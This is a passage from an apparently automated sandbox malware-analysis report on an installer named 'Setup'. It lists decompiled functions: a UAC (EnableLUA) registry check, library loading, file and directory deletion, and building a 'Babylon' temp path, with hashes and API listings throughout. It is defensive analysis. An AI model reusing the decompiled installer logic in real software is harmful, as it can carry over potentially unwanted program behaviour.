                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memset$PathPrivateProfileSearchString
                                                                                                                                                              • String ID: J/M
                                                                                                                                                              • API String ID: 582612538-2554188868
                                                                                                                                                              • Opcode ID: 8c980df8abfcb9912a267a226ee280e353d935216a7ddd34d413122323a99119
                                                                                                                                                              • Instruction ID: 4692963f7d416df05ce02a8c07cd532fa1bfbc1300a29e1f714706a3fff324ba
                                                                                                                                                              • Opcode Fuzzy Hash: 8c980df8abfcb9912a267a226ee280e353d935216a7ddd34d413122323a99119
                                                                                                                                                              • Instruction Fuzzy Hash: AA519470A00218ABEB14EF55CD65BEE7774EF54308F10416EF50A6B3C1DB78AA84CB99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                              			E004953B0(void* __eflags) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				char _v29;
                                                                                                                                                              				char _v30;
                                                                                                                                                              				signed int _t19;
                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				void* _t28;
                                                                                                                                                              				signed int _t38;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5059f3);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t19 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t19 ^ _t38);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				E00434E30( &_v24);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if((E00494F20(__eflags) & 0x000000ff) == 0) {
                                                                                                                                                              					L5:
                                                                                                                                                              					_v30 = 0;
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0041EF60( &_v24);
                                                                                                                                                              					_t26 = _v30;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t27 = E0041EEA0( &_v24, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0x20019); // executed
                                                                                                                                                              					if(_t27 != 0) {
                                                                                                                                                              						goto L5;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v28 = 0;
                                                                                                                                                              						_t28 = E00429BB0( &_v24, L"EnableLUA",  &_v28); // executed
                                                                                                                                                              						if(_t28 != 0 || _v28 != 1) {
                                                                                                                                                              							goto L5;
                                                                                                                                                              						} else {
                                                                                                                                                              							_v29 = 1;
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							E0041EF60( &_v24);
                                                                                                                                                              							_t26 = _v29;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _t26;
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 004953D8
                                                                                                                                                                • Part of subcall function 0041EEA0: RegOpenKeyExW.KERNEL32(00000001,?,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\,00000001), ref: 0041EECA
                                                                                                                                                                • Part of subcall function 00429BB0: RegQueryValueExW.KERNEL32(DDD124F9,00000004,00000000,DDD124F9,?,00000004,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System), ref: 00429BE0
                                                                                                                                                              Strings
                                                                                                                                                              • EnableLUA, xrefs: 00495416
                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 004953F5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Iterator_baseIterator_base::_OpenQueryValuestd::_
                                                                                                                                                              • String ID: EnableLUA$Software\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                                                              • API String ID: 396298244-2158134279
                                                                                                                                                              • Opcode ID: e8424a432b09796e039caeee3fd81409fe03dcfc1f841f83dfc53752b70cbb59
                                                                                                                                                              • Instruction ID: 29ad32eb1deafc1a9237aec2643cf2849c09354840a95a285363a7d82d27e06b
                                                                                                                                                              • Opcode Fuzzy Hash: e8424a432b09796e039caeee3fd81409fe03dcfc1f841f83dfc53752b70cbb59
                                                                                                                                                              • Instruction Fuzzy Hash: CB11D03090064ADBCF01DFA1D902BFFBFB4EB14319F20026EE811622C1EB785A05C796
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                              			E0044F76F(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				char _v16;
                                                                                                                                                              				void* _t11;
                                                                                                                                                              				signed int _t12;
                                                                                                                                                              				intOrPtr* _t16;
                                                                                                                                                              				void* _t19;
                                                                                                                                                              				void* _t25;
                                                                                                                                                              				void* _t26;
                                                                                                                                                              
                                                                                                                                                              				_t26 = __edi;
                                                                                                                                                              				_t19 = __ebx;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t11 = E0044FBD9(_t19, _t25, _t26, _a4); // executed
                                                                                                                                                              					if(_t11 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t12 = E00456FFC(_a4);
                                                                                                                                                              					__eflags = _t12;
                                                                                                                                                              					if(_t12 == 0) {
                                                                                                                                                              						__eflags =  *0x5bc914 & 0x00000001;
                                                                                                                                                              						if(( *0x5bc914 & 0x00000001) == 0) {
                                                                                                                                                              							 *0x5bc914 =  *0x5bc914 | 0x00000001;
                                                                                                                                                              							__eflags =  *0x5bc914;
                                                                                                                                                              							E0044F754(0x5bc908);
                                                                                                                                                              							E0044FAE5( *0x5bc914, 0x51a041);
                                                                                                                                                              						}
                                                                                                                                                              						E00417C20(0x5bc908);
                                                                                                                                                              						E00456A4C( &_v16, 0x544b88);
                                                                                                                                                              						asm("int3");
                                                                                                                                                              						_t16 =  &_v16;
                                                                                                                                                              						 *(_t16 + 4) =  *(_t16 + 4) & 0x00000000;
                                                                                                                                                              						_t9 = _t16 + 8;
                                                                                                                                                              						 *_t9 =  *(_t16 + 8) & 0x00000000;
                                                                                                                                                              						__eflags =  *_t9;
                                                                                                                                                              						 *_t16 = 0x51bc00;
                                                                                                                                                              						return _t16;
                                                                                                                                                              					} else {
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					L8:
                                                                                                                                                              				}
                                                                                                                                                              				return _t11;
                                                                                                                                                              				goto L8;
                                                                                                                                                              			}










                                                                                                                                                              0x0044f7e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f784
                                                                                                                                                              0x0044f794
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • _malloc.LIBCMT ref: 0044F789
                                                                                                                                                                • Part of subcall function 0044FBD9: __FF_MSGBANNER.LIBCMT ref: 0044FBFC
                                                                                                                                                                • Part of subcall function 0044FBD9: __NMSG_WRITE.LIBCMT ref: 0044FC03
                                                                                                                                                                • Part of subcall function 0044FBD9: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00457755,?,00000001,?,?,00457D86,00000018,005444D8,0000000C,00457E17), ref: 0044FC50
                                                                                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0044F7AC
                                                                                                                                                                • Part of subcall function 0044F754: std::exception::exception.LIBCMT ref: 0044F760
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                              • String ID: Pyr
                                                                                                                                                              • API String ID: 3447465555-3752401018
                                                                                                                                                              • Opcode ID: 0054d67c207d4c7568505f88fa2829a4319c9a7d50decf1bb6392ddf8cc42fb3
                                                                                                                                                              • Instruction ID: a2ac23eca041f9d271ebf24056ea33b4297bb616494d032b84d1e5c4886cc8d0
                                                                                                                                                              • Opcode Fuzzy Hash: 0054d67c207d4c7568505f88fa2829a4319c9a7d50decf1bb6392ddf8cc42fb3
                                                                                                                                                              • Instruction Fuzzy Hash: D7F0823190120566FB046722EC17A9A3FA89B4535CB10403FFC0595592DE6DBA4D929D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                              			E004251B0(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, WCHAR* _a4) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				short _v532;
                                                                                                                                                              				intOrPtr* _v536;
                                                                                                                                                              				intOrPtr _v540;
                                                                                                                                                              				signed int _t21;
                                                                                                                                                              				struct HINSTANCE__* _t29;
                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                              				intOrPtr _t48;
                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                              				signed int _t50;
                                                                                                                                                              
                                                                                                                                                              				_t49 = __esi;
                                                                                                                                                              				_t48 = __edi;
                                                                                                                                                              				_t45 = __edx;
                                                                                                                                                              				_t36 = __ebx;
                                                                                                                                                              				_t21 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_v8 = _t21 ^ _t50;
                                                                                                                                                              				_v536 = __ecx;
                                                                                                                                                              				if( *(_v536 + 4) == 0) {
                                                                                                                                                              					E0045184A( &_v532, _a4);
                                                                                                                                                              					 *(PathFindFileNameW( &_v532)) = 0;
                                                                                                                                                              					E004250E0( &_v532);
                                                                                                                                                              					_t29 = LoadLibraryW(_a4); // executed
                                                                                                                                                              					 *(_v536 + 4) = _t29;
                                                                                                                                                              					E004250E0(0);
                                                                                                                                                              					_t45 = _v536;
                                                                                                                                                              					if( *(_v536 + 4) == 0) {
                                                                                                                                                              						L5:
                                                                                                                                                              						_v540 = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t45 =  *_v536;
                                                                                                                                                              						if(( *((intOrPtr*)( *((intOrPtr*)( *_v536 + 0xc))))() & 0x000000ff) == 0) {
                                                                                                                                                              							goto L5;
                                                                                                                                                              						} else {
                                                                                                                                                              							_v540 = 1;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t31 = _v540;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t31 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				return E0044F6C8(_t31, _t36, _v8 ^ _t50, _t45, _t48, _t49);
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindLibraryLoadNamePath_wcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 138660897-0
                                                                                                                                                              • Opcode ID: 27f36e94a2a0778c7418ac5df22fa15c45a046c2cd3d214a7575e3742c6b0493
                                                                                                                                                              • Instruction ID: a037339b6b14c3ba7ad3918af33b6b3a3ac40648552c2881e58c205521017534
                                                                                                                                                              • Opcode Fuzzy Hash: 27f36e94a2a0778c7418ac5df22fa15c45a046c2cd3d214a7575e3742c6b0493
                                                                                                                                                              • Instruction Fuzzy Hash: 1C2193B4A4011CCBDB14EF54E888BE9B7B1AF28304F4485DAE40D5B351D7749E84CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E0049E5B0(void* __ecx, intOrPtr _a4, signed char _a8) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				int _t9;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                              					SetFileAttributesW(E00416A30(_a4 + 4), 0x80);
                                                                                                                                                              				}
                                                                                                                                                              				_t9 = DeleteFileW(E00416A30(_a4 + 4)); // executed
                                                                                                                                                              				if(_t9 != 0) {
                                                                                                                                                              					return 1;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v8 = GetLastError();
                                                                                                                                                              					if(_v8 == 2 || _v8 == 3) {
                                                                                                                                                              						return 1;
                                                                                                                                                              					} else {
                                                                                                                                                              						return 0;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,004F721A,?,00000000,bab_tmp_web.html,00000000,00000000,00000000,DDD124F9), ref: 0049E5CD
                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,004F721A,?,00000000,bab_tmp_web.html,00000000,00000000,00000000,DDD124F9), ref: 0049E5DF
                                                                                                                                                              • GetLastError.KERNEL32(?,004F721A,?,00000000,bab_tmp_web.html,00000000,00000000,00000000,DDD124F9), ref: 0049E5E9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesDeleteErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1736513994-0
                                                                                                                                                              • Opcode ID: c92789c02eee6c880e195e83b484d1ee3f6e110011f4c04e5ce39a863ca8df47
                                                                                                                                                              • Instruction ID: 6351115cbb09d7aa138f8d0f2ad5c1d28e13df6de63dbdbedb9bb6d0ae47607d
                                                                                                                                                              • Opcode Fuzzy Hash: c92789c02eee6c880e195e83b484d1ee3f6e110011f4c04e5ce39a863ca8df47
                                                                                                                                                              • Instruction Fuzzy Hash: 4AF0E930541214BBEF10DFB3C81D2BE7F68AE2231EF40C06AF80257301DA38DA04EA69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00455218(WCHAR* _a4) {
                                                                                                                                                              				int _t2;
                                                                                                                                                              				long _t3;
                                                                                                                                                              
                                                                                                                                                              				_t2 = RemoveDirectoryW(_a4); // executed
                                                                                                                                                              				if(_t2 != 0) {
                                                                                                                                                              					_t3 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t3 = GetLastError();
                                                                                                                                                              				}
                                                                                                                                                              				if(_t3 == 0) {
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					return E0045449D(_t3) | 0xffffffff;
                                                                                                                                                              				}
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • RemoveDirectoryW.KERNEL32(000000FF,?,0049E5A4,00000000,?,004D65B9,?,000000FF,000000FF,0000005C,000000FF,?,00000000,00000000,DDD124F9), ref: 00455220
                                                                                                                                                              • GetLastError.KERNEL32(?,0049E5A4,00000000,?,004D65B9,?,000000FF,000000FF,0000005C,000000FF,?,00000000,00000000,DDD124F9), ref: 0045522A
                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00455239
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectoryErrorLastRemove__dosmaperr
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4061612599-0
                                                                                                                                                              • Opcode ID: 4f121293ec929a833d3eeb2b2a184cae1bd3b805ed201971d6b715f4f866c10b
                                                                                                                                                              • Instruction ID: 3663204bc7aed2f6ba477911cfe8aae5d527464cf46f9ba901a5bb3a8d9226d4
                                                                                                                                                              • Opcode Fuzzy Hash: 4f121293ec929a833d3eeb2b2a184cae1bd3b805ed201971d6b715f4f866c10b
                                                                                                                                                              • Instruction Fuzzy Hash: 07D05E31244A05669B001BB6AC1C9373B9C9A8137AB1586A6FC2CC8192EF29C858AE95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E004F78F0(intOrPtr __ebx, WCHAR* __ecx, intOrPtr __edi, intOrPtr __esi, WCHAR* _a4, intOrPtr _a8) {
                                                                                                                                                              				signed char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				WCHAR* _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				char _v544;
                                                                                                                                                              				char _v576;
                                                                                                                                                              				char _v577;
                                                                                                                                                              				char _v612;
                                                                                                                                                              				char _v613;
                                                                                                                                                              				WCHAR* _v620;
                                                                                                                                                              				signed int _v624;
                                                                                                                                                              				signed int _t53;
                                                                                                                                                              				signed int _t54;
                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                              				signed int _t90;
                                                                                                                                                              				void* _t91;
                                                                                                                                                              				void* _t92;
                                                                                                                                                              
                                                                                                                                                              				_t89 = __esi;
                                                                                                                                                              				_t88 = __edi;
                                                                                                                                                              				_t69 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5099f7);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t92 = _t91 - 0x260;
                                                                                                                                                              				_t53 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t54 = _t53 ^ _t90;
                                                                                                                                                              				_v24 = _t54;
                                                                                                                                                              				_push(_t54);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v620 = __ecx;
                                                                                                                                                              				_v20 = 0x80004005;
                                                                                                                                                              				_v624 = E004F7700(_v620, _a8);
                                                                                                                                                              				_t73 = _v624 - 1;
                                                                                                                                                              				_v624 = _v624 - 1;
                                                                                                                                                              				if(_v624 > 4) {
                                                                                                                                                              					L12:
                                                                                                                                                              					_t95 = _v20;
                                                                                                                                                              					if(_v20 != 0) {
                                                                                                                                                              						E00417910(_v620, E00434050( &_v613));
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						E004181D0(_a4,  &_v612);
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              					} else {
                                                                                                                                                              						_t87 = _a4;
                                                                                                                                                              						E00422290(_t69, _t73, _t88, _t89, _t95, _a4);
                                                                                                                                                              						E004130D0( &(_a4[2]), L"Babylon\\");
                                                                                                                                                              					}
                                                                                                                                                              					_t63 = E00416A30( &(_a4[2]));
                                                                                                                                                              					 *[fs:0x0] = _v16;
                                                                                                                                                              					return E0044F6C8(_t63, _t69, _v24 ^ _t90, _t87, _t88, _t89);
                                                                                                                                                              				}
                                                                                                                                                              				_t87 = _v624;
                                                                                                                                                              				switch( *((intOrPtr*)(_v624 * 4 +  &M004F7AF4))) {
                                                                                                                                                              					case 0:
                                                                                                                                                              						_t68 = E00495D00(__ebx, __edi, __esi, 0x23, _a4, 1, 1); // executed
                                                                                                                                                              						_t92 = _t92 + 0x10;
                                                                                                                                                              						_v20 = _t68;
                                                                                                                                                              						goto L12;
                                                                                                                                                              					case 1:
                                                                                                                                                              						__ecx = _a4;
                                                                                                                                                              						__eax = E00495D00(__ebx, __edi, __esi, 0x1a, _a4, 1, 1); // executed
                                                                                                                                                              						_v20 = __eax;
                                                                                                                                                              						goto L12;
                                                                                                                                                              					case 2:
                                                                                                                                                              						__edx = _a4;
                                                                                                                                                              						__eax = E00495D00(__ebx, __edi, __esi, 0x1c, _a4, 1, 1); // executed
                                                                                                                                                              						_v20 = __eax;
                                                                                                                                                              						__eflags = _v20;
                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                              							goto L6;
                                                                                                                                                              						}
                                                                                                                                                              						goto L12;
                                                                                                                                                              					case 3:
                                                                                                                                                              						L10:
                                                                                                                                                              						__edx =  &_v544;
                                                                                                                                                              						__eax = GetTempPathW(0x104, __edx);
                                                                                                                                                              						__ecx = 0;
                                                                                                                                                              						__eflags = 0 - __eax;
                                                                                                                                                              						asm("sbb edx, edx");
                                                                                                                                                              						__edx = __edx & 0x7fffbffb;
                                                                                                                                                              						__edx =  &(__edx[0xffffffffc0002003]);
                                                                                                                                                              						__eflags = __edx;
                                                                                                                                                              						_v20 = __edx;
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							__ecx =  &_v577;
                                                                                                                                                              							E00434050( &_v577) =  &_v544;
                                                                                                                                                              							__ecx =  &_v576;
                                                                                                                                                              							__eax = E00417910( &_v544,  &_v544);
                                                                                                                                                              							_v8 = 0;
                                                                                                                                                              							__ecx =  &_v576;
                                                                                                                                                              							__ecx = _a4;
                                                                                                                                                              							__eax = E004181D0(_a4,  &_v576);
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							__ecx =  &_v576;
                                                                                                                                                              							__eax = E004176E0();
                                                                                                                                                              						}
                                                                                                                                                              						goto L12;
                                                                                                                                                              					case 4:
                                                                                                                                                              						L6:
                                                                                                                                                              						__eax = _a4;
                                                                                                                                                              						__ecx = _v620;
                                                                                                                                                              						_v20 = E004F77C0(__ebx, __ecx, __edi, __esi, __eflags, _a4);
                                                                                                                                                              						__eflags = _v20;
                                                                                                                                                              						if(_v20 < 0) {
                                                                                                                                                              							__ecx = _a4;
                                                                                                                                                              							_v20 = E00495D00(__ebx, __edi, __esi, 0x1c, _a4, 1, 1);
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v20;
                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                              							goto L10;
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L12;
                                                                                                                                                              						}
                                                                                                                                                              				}
                                                                                                                                                              			}





















                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000000,?,?,?,?,?,?,?,Babylon\), ref: 004F7A00
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PathTemp
                                                                                                                                                              • String ID: Babylon\
                                                                                                                                                              • API String ID: 2920410445-964554263
                                                                                                                                                              • Opcode ID: c93090c39fa83e8d30784dd74e6697c71b14cdb4a9cf41bab932b34c23336e0c
                                                                                                                                                              • Instruction ID: 9b04c22fcb007ae7e9457040daaacfd2f73ff2dc511d6759e3a31cb4679aa1fb
                                                                                                                                                              • Opcode Fuzzy Hash: c93090c39fa83e8d30784dd74e6697c71b14cdb4a9cf41bab932b34c23336e0c
                                                                                                                                                              • Instruction Fuzzy Hash: 40516CB190811CABDB14EF64DC85BFEB775EB04304F1046AEE6156A281DBB96B80CF94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                              			E004549D5(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                              				intOrPtr _t19;
                                                                                                                                                              				intOrPtr _t22;
                                                                                                                                                              				void* _t33;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              
                                                                                                                                                              				_t30 = __edi;
                                                                                                                                                              				_t29 = __edx;
                                                                                                                                                              				_push(0xc);
                                                                                                                                                              				_push(0x544300);
                                                                                                                                                              				E00456860(__ebx, __edi, __esi);
                                                                                                                                                              				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
                                                                                                                                                              				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
                                                                                                                                                              					L6:
                                                                                                                                                              					_t19 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
                                                                                                                                                              						E0045D801( *((intOrPtr*)(_t33 + 0x18)));
                                                                                                                                                              						 *((intOrPtr*)(_t33 - 4)) = 0;
                                                                                                                                                              						_t22 = E004547CB(__edx,  *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
                                                                                                                                                              						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
                                                                                                                                                              						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
                                                                                                                                                              						E00454A61();
